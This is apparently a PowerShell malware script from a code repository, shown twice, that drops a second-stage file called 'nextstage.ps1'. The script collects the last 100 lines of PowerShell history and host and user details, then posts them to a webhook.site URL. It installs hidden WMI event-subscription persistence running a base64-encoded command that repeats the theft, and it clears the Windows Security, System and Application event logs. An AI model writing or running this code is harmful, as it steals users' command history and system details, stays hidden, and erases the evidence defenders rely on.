Anahitaadl/nextstage.ps1

## nextstage.ps1
@'
# Collect history + sysinfo
$hist = Get-Content (Get-PSReadlineOption).HistorySavePath | Select-Object -Last 100
$info = [PSCustomObject]@{ Timestamp=(Get-Date).ToString('o'); Host=$env:COMPUTERNAME; User=$env:USERNAME; OS=(Get-CimInstance Win32_OperatingSystem).Caption }
$payload = @{ history=$hist; sysinfo=$info } | ConvertTo-Json -Depth 3

# Exfiltrate
Invoke-RestMethod -Uri 'https://webhook.site/946cd34a-009c-4850-820b-d43d2cbcd4f6' -Method Post -Body $payload -ContentType 'application/json'

# WMI Persistence
$filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{
  Name='DuckFilter'; EventNameSpace='root/cimv2'; QueryLanguage='WQL';
  Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_OperatingSystem'"
}
$consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{
  Name='DuckConsumer';
  CommandLineTemplate="powershell -NoProfile -WindowStyle Hidden -EncodedCommand IwAgAD0APQA9ACAAUwBlAGMAbwBuAGQALQBTAHQAYQBnAGUAIABTAGMAcgBpAHAAdAAgACgAbgBlAHgAdABzAHQAYQBnAGUALgBwAHMAMQApACAAPQA9AD0ACgAKACMAIAAxAC4AIABDAG8AbABsAGUAYwB0ACAAdABoAGUAIABsAGEAcwB0ACAAMQAwADAAIABQAFMAUgBlAGEAZABMAGkAbgBlACAAaABpAHMAdABvAHIAeQAgAGUAbgB0AHIAaQBlAHMACgAkAGgAaQBzAHQAIAA9ACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAKABHAGUAdAAtAFAAUwBSAGUAYQBkAGwAaQBuAGUATwBwAHQAaQBvAG4AKQAuAEgAaQBzAHQAbwByAHkAUwBhAHYAZQBQAGEAdABoACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADAAMAAKAAoAIwAgADIALgAgAEMAbwBsAGwAZQBjAHQAIABzAHkAcwB0AGUAbQAgAGkAbgBmAG8ACgAkAGkAbgBmAG8AIAA9ACAAWwBQAFMAQwB1AHMAdABvAG0ATwBiAGoAZQBjAHQAXQBAAHsACgAgACAAVABpAG0AZQBzAHQAYQBtAHAAIAA9ACAAKABHAGUAdAAtAEQAYQB0AGUAKQAuAFQAbwBTAHQAcgBpAG4AZwAoACcAbwAnACkACgAgACAASABvAHMAdABuAGEAbQBlACAAIAA9ACAAJABlAG4AdgA6AEMATwBNAFAAVQBUAEUAUgBOAEEATQBFAAoAIAAgAFUAcwBlAHIAIAAgACAAIAAgACAAPQAgACQAZQBuAHYAOgBVAFMARQBSAE4AQQBNAEUACgAgACAATwBTACAAIAAgACAAIAAgACAAIAA9ACAAKABHAGUAdAAtAEMAaQBtAEkAbgBzAHQAYQBuAGMAZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBDAGEAcAB0AGkAbwBuAAoAfQAKAAoAIwAgADMALgAgAFAAYQBjAGsAYQBnAGUAIABhAHMAIABKAFMATwBOAAoAJABwAGEAeQBsAG8AYQBkACAAPQAgAEAAewAgAGgAaQBzAHQAbwByAHkAPQAkAGgAaQBzAHQAOwAgAHMAeQBzAGkAbgBmAG8APQAkAGkAbgBmAG8AIAB9ACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARABlAHAAdABoACAAMwAKAAoAIwAgADQALgAgAEUAeABmAGkAbAB0AHIAYQB0AGUAIAB0AG8AIAB5AG8AdQByACAAdwBlAGIAaABvAG8AawAKAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgAC0AVQByAGkAIAAnAGgAdAB0AHAAcwA6AC8ALwB3AGUAYgBoAG8AbwBrAC4AcwBpAHQAZQAvADkANAA2AGMAZAAzADQAYQAtADAAMAA5AGMALQA0ADgANQAwAC0AOAAyADAAYgAtAGQANAAzAGQAMgBjAGIAYwBkADQAZgA2ACcAIABgAAoAIAAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBCAG8AZAB5ACAAJABwAGEAeQBsAG8AYQBkACAALQBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AJwAKAAoAIwAgADUALgAgAEkAbgBzAHQAYQBsAGwAIABXAE0ASQAgAHAAZQByAHMAaQBzAHQAZQBuAGMAZQAKACQAZgBpAGwAdABlAHIAIAA9ACAAUwBlAHQALQBXAG0AaQBJAG4AcwB0AGEAbgBjAGUAIAAtAE4AYQBtAGUAcwBwAGEAYwBlACAAcgBvAG8AdAAvAHMAdQBiAHMAYwByAGkAcAB0AGkAbwBuACAALQBDAGwAYQBzAHMAIABfAF8ARQB2AGUAbgB0AEYAaQBsAHQAZQByACAALQBBAHIAZwB1AG0AZQBuAHQAcwAgAEAAewAKACAAIABOAGEAbQBlAD0AJwBEAHUAYwBrAEYAaQBsAHQAZQByACcAOwAgAEUAdgBlAG4AdABOAGEAbQBlAFMAcABhAGMAZQA9ACcAcgBvAG8AdAAvAGMAaQBtAHYAMgAnADsAIABRAHUAZQByAHkATABhAG4AZwB1AGEAZwBlAD0AJwBXAFEATAAnADsACgAgACAAUQB1AGUAcgB5AD0AIgBTAEUATABFAEMAVAAgACoAIABGAFIATwBNACAAXwBfAEkAbgBzAHQAYQBuAGMAZQBNAG8AZABpAGYAaQBjAGEAdABpAG8AbgBFAHYAZQBuAHQAIABXAEkAVABIAEkATgAgADYAMAAgAFcASABFAFIARQAgAFQAYQByAGcAZQB0AEkAbgBzAHQAYQBuAGMAZQAgAEkAUwBBACAAJwBXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQAnACIACgB9AAoAJABjAG8AbgBzAHUAbQBlAHIAIAA9ACAAUwBlAHQALQBXAG0AaQBJAG4AcwB0AGEAbgBjAGUAIAAtAE4AYQBtAGUAcwBwAGEAYwBlACAAcgBvAG8AdAAvAHMAdQBiAHMAYwByAGkAcAB0AGkAbwBuACAALQBDAGwAYQBzAHMAIABDAG8AbQBtAGEAbgBkAEwAaQBuAGUARQB2AGUAbgB0AEMAbwBuAHMAdQBtAGUAcgAgAC0AQQByAGcAdQBtAGUAbgB0AHMAIABAAHsACgAgACAATgBhAG0AZQA9ACcARAB1AGMAawBDAG8AbgBzAHUAbQBlAHIAJwA7AAoAIAAgAEMAbwBtAG0AYQBuAGQATABpAG4AZQBUAGUAbQBwAGwAYQB0AGUAPQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQAHIAbwBmAGkAbABlACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAPABTAFQAQQBHAEUAMgBfAEIANgA0AD4AIgAKAH0ACgBTAGUAdAAtAFcAbQBpAEkAbgBzAHQAYQBuAGMAZQAgAC0ATgBhAG0AZQBzAHAAYQBjAGUAIAByAG8AbwB0AC8AcwB1AGIAcwBjAHIAaQBwAHQAaQBvAG4AIAAtAEMAbABhAHMAcwAgAF8AXwBGAGkAbAB0AGUAcgBUAG8AQwBvAG4AcwB1AG0AZQByAEIAaQBuAGQAaQBuAGcAIABgAAoAIAAgAC0AQQByAGcAdQBtAGUAbgB0AHMAIABAAHsAIABGAGkAbAB0AGUAcgA9ACQAZgBpAGwAdABlAHIAOwAgAEMAbwBuAHMAdQBtAGUAcgA9ACQAYwBvAG4AcwB1AG0AZQByACAAfQAKAAoAIwAgADYALgAgAFcAaQBwAGUAIABXAGkAbgBkAG8AdwBzACAAZQB2AGUAbgB0ACAAbABvAGcAcwAKAHcAZQB2AHQAdQB0AGkAbAAgAGMAbAAgAFMAZQBjAHUAcgBpAHQAeQAKAHcAZQB2AHQAdQB0AGkAbAAgAGMAbAAgAFMAeQBzAHQAZQBtAAoAdwBlAHYAdAB1AHQAaQBsACAAYwBsACAAQQBwAHAAbABpAGMAYQB0AGkAbwBuAA0ACgA="
}
Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{ Filter=$filter; Consumer=$consumer }

# Clear logs
wevtutil cl Security; wevtutil cl System; wevtutil cl Application
'@ | Out-File -FilePath "$env:USERPROFILE\duckydrive\nextstage.ps1" -Encoding UTF8
	@'
	# Collect history + sysinfo
	$hist = Get-Content (Get-PSReadlineOption).HistorySavePath \| Select-Object -Last 100
	$info = [PSCustomObject]@{ Timestamp=(Get-Date).ToString('o'); Host=$env:COMPUTERNAME; User=$env:USERNAME; OS=(Get-CimInstance Win32_OperatingSystem).Caption }
	$payload = @{ history=$hist; sysinfo=$info } \| ConvertTo-Json -Depth 3

	# Exfiltrate
	Invoke-RestMethod -Uri 'https://webhook.site/946cd34a-009c-4850-820b-d43d2cbcd4f6' -Method Post -Body $payload -ContentType 'application/json'

	# WMI Persistence
	$filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{
	Name='DuckFilter'; EventNameSpace='root/cimv2'; QueryLanguage='WQL';
	Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_OperatingSystem'"
	}
	$consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{
	Name='DuckConsumer';
	CommandLineTemplate="powershell -NoProfile -WindowStyle Hidden -EncodedCommand IwAgAD0APQA9ACAAUwBlAGMAbwBuAGQALQBTAHQAYQBnAGUAIABTAGMAcgBpAHAAdAAgACgAbgBlAHgAdABzAHQAYQBnAGUALgBwAHMAMQApACAAPQA9AD0ACgAKACMAIAAxAC4AIABDAG8AbABsAGUAYwB0ACAAdABoAGUAIABsAGEAcwB0ACAAMQAwADAAIABQAFMAUgBlAGEAZABMAGkAbgBlACAAaABpAHMAdABvAHIAeQAgAGUAbgB0AHIAaQBlAHMACgAkAGgAaQBzAHQAIAA9ACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAKABHAGUAdAAtAFAAUwBSAGUAYQBkAGwAaQBuAGUATwBwAHQAaQBvAG4AKQAuAEgAaQBzAHQAbwByAHkAUwBhAHYAZQBQAGEAdABoACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADAAMAAKAAoAIwAgADIALgAgAEMAbwBsAGwAZQBjAHQAIABzAHkAcwB0AGUAbQAgAGkAbgBmAG8ACgAkAGkAbgBmAG8AIAA9ACAAWwBQAFMAQwB1AHMAdABvAG0ATwBiAGoAZQBjAHQAXQBAAHsACgAgACAAVABpAG0AZQBzAHQAYQBtAHAAIAA9ACAAKABHAGUAdAAtAEQAYQB0AGUAKQAuAFQAbwBTAHQAcgBpAG4AZwAoACcAbwAnACkACgAgACAASABvAHMAdABuAGEAbQBlACAAIAA9ACAAJABlAG4AdgA6AEMATwBNAFAAVQBUAEUAUgBOAEEATQBFAAoAIAAgAFUAcwBlAHIAIAAgACAAIAAgACAAPQAgACQAZQBuAHYAOgBVAFMARQBSAE4AQQBNAEUACgAgACAATwBTACAAIAAgACAAIAAgACAAIAA9ACAAKABHAGUAdAAtAEMAaQBtAEkAbgBzAHQAYQBuAGMAZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBDAGEAcAB0AGkAbwBuAAoAfQAKAAoAIwAgADMALgAgAFAAYQBjAGsAYQBnAGUAIABhAHMAIABKAFMATwBOAAoAJABwAGEAeQBsAG8AYQBkACAAPQAgAEAAewAgAGgAaQBzAHQAbwByAHkAPQAkAGgAaQBzAHQAOwAgAHMAeQBzAGkAbgBmAG8APQAkAGkAbgBmAG8AIAB9ACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARABlAHAAdABoACAAMwAKAAoAIwAgADQALgAgAEUAeABmAGkAbAB0AHIAYQB0AGUAIAB0AG8AIAB5AG8AdQByACAAdwBlAGIAaABvAG8AawAKAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgAC0AVQByAGkAIAAnAGgAdAB0AHAAcwA6AC8ALwB3AGUAYgBoAG8AbwBrAC4AcwBpAHQAZQAvADkANAA2AGMAZAAzADQAYQAtADAAMAA5AGMALQA0ADgANQAwAC0AOAAyADAAYgAtAGQANAAzAGQAMgBjAGIAYwBkADQAZgA2ACcAIABgAAoAIAAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBCAG8AZAB5ACAAJABwAGEAeQBsAG8AYQBkACAALQBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AJwAKAAoAIwAgADUALgAgAEkAbgBzAHQAYQBsAGwAIABXAE0ASQAgAHAAZQByAHMAaQBzAHQAZQBuAGMAZQAKACQAZgBpAGwAdABlAHIAIAA9ACAAUwBlAHQALQBXAG0AaQBJAG4AcwB0AGEAbgBjAGUAIAAtAE4AYQBtAGUAcwBwAGEAYwBlACAAcgBvAG8AdAAvAHMAdQBiAHMAYwByAGkAcAB0AGkAbwBuACAALQBDAGwAYQBzAHMAIABfAF8ARQB2AGUAbgB0AEYAaQBsAHQAZQByACAALQBBAHIAZwB1AG0AZQBuAHQAcwAgAEAAewAKACAAIABOAGEAbQBlAD0AJwBEAHUAYwBrAEYAaQBsAHQAZQByACcAOwAgAEUAdgBlAG4AdABOAGEAbQBlAFMAcABhAGMAZQA9ACcAcgBvAG8AdAAvAGMAaQBtAHYAMgAnADsAIABRAHUAZQByAHkATABhAG4AZwB1AGEAZwBlAD0AJwBXAFEATAAnADsACgAgACAAUQB1AGUAcgB5AD0AIgBTAEUATABFAEMAVAAgACoAIABGAFIATwBNACAAXwBfAEkAbgBzAHQAYQBuAGMAZQBNAG8AZABpAGYAaQBjAGEAdABpAG8AbgBFAHYAZQBuAHQAIABXAEkAVABIAEkATgAgADYAMAAgAFcASABFAFIARQAgAFQAYQByAGcAZQB0AEkAbgBzAHQAYQBuAGMAZQAgAEkAUwBBACAAJwBXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQAnACIACgB9AAoAJABjAG8AbgBzAHUAbQBlAHIAIAA9ACAAUwBlAHQALQBXAG0AaQBJAG4AcwB0AGEAbgBjAGUAIAAtAE4AYQBtAGUAcwBwAGEAYwBlACAAcgBvAG8AdAAvAHMAdQBiAHMAYwByAGkAcAB0AGkAbwBuACAALQBDAGwAYQBzAHMAIABDAG8AbQBtAGEAbgBkAEwAaQBuAGUARQB2AGUAbgB0AEMAbwBuAHMAdQBtAGUAcgAgAC0AQQByAGcAdQBtAGUAbgB0AHMAIABAAHsACgAgACAATgBhAG0AZQA9ACcARAB1AGMAawBDAG8AbgBzAHUAbQBlAHIAJwA7AAoAIAAgAEMAbwBtAG0AYQBuAGQATABpAG4AZQBUAGUAbQBwAGwAYQB0AGUAPQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQAHIAbwBmAGkAbABlACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAPABTAFQAQQBHAEUAMgBfAEIANgA0AD4AIgAKAH0ACgBTAGUAdAAtAFcAbQBpAEkAbgBzAHQAYQBuAGMAZQAgAC0ATgBhAG0AZQBzAHAAYQBjAGUAIAByAG8AbwB0AC8AcwB1AGIAcwBjAHIAaQBwAHQAaQBvAG4AIAAtAEMAbABhAHMAcwAgAF8AXwBGAGkAbAB0AGUAcgBUAG8AQwBvAG4AcwB1AG0AZQByAEIAaQBuAGQAaQBuAGcAIABgAAoAIAAgAC0AQQByAGcAdQBtAGUAbgB0AHMAIABAAHsAIABGAGkAbAB0AGUAcgA9ACQAZgBpAGwAdABlAHIAOwAgAEMAbwBuAHMAdQBtAGUAcgA9ACQAYwBvAG4AcwB1AG0AZQByACAAfQAKAAoAIwAgADYALgAgAFcAaQBwAGUAIABXAGkAbgBkAG8AdwBzACAAZQB2AGUAbgB0ACAAbABvAGcAcwAKAHcAZQB2AHQAdQB0AGkAbAAgAGMAbAAgAFMAZQBjAHUAcgBpAHQAeQAKAHcAZQB2AHQAdQB0AGkAbAAgAGMAbAAgAFMAeQBzAHQAZQBtAAoAdwBlAHYAdAB1AHQAaQBsACAAYwBsACAAQQBwAHAAbABpAGMAYQB0AGkAbwBuAA0ACgA="
	}
	Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{ Filter=$filter; Consumer=$consumer }

	# Clear logs
	wevtutil cl Security; wevtutil cl System; wevtutil cl Application
	'@ \| Out-File -FilePath "$env:USERPROFILE\duckydrive\nextstage.ps1" -Encoding UTF8